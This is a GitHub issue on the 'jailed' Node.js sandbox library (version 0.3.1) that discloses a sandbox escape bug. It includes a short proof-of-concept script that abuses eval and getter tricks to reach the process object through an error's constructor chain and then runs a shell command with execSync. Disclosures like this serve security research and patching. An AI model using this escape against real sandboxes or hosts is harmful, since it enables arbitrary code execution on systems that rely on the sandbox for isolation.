asvd / jailed

execute untrusted code with custom permissions


Sandbox Escape Bug in jailed with Node.js

seongil-wi opened this issue · comments

- Jailed version: 0.3.1
- Node version: 18.15.0
- run-jailed.js

```javascript
var jailed = require('jailed');
var api = {};
var plugin = new jailed.Plugin('./test_case.js', api);
```

- test_case.js

```javascript
try{ 
    this.__defineGetter__("x", eval);
    eval.toString = toLocaleString
    eval < x
 } catch(pp){
    pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); 
}

application.disconnect();
```

The sandbox can be escaped by three lines of code (notice that each line of code is essential to triggering the bug).
We can execute arbitrary shell code using the process module.